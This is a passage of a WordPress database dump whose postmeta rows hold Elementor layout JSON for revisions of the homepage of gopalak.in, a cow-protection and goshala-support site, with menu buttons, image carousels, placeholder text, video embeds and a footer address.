pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10278,1717,'_elementor_page_assets','a:0:{}'),(10280,1718,'_elementor_edit_mode','builder'),(10281,1718,'_elementor_template_type','wp-page'),(10282,1718,'_elementor_version','3.7.8'),(10283,1718,'_wp_page_template','elementor_canvas'),(10284,1718,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10285,1718,'_elementor_page_assets','a:0:{}'),(10288,1719,'_elementor_edit_mode','builder'),(10289,1719,'_elementor_template_type','wp-page'),(10290,1719,'_elementor_version','3.7.8'),(10291,1719,'_wp_page_template','elementor_canvas'),(10292,1719,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 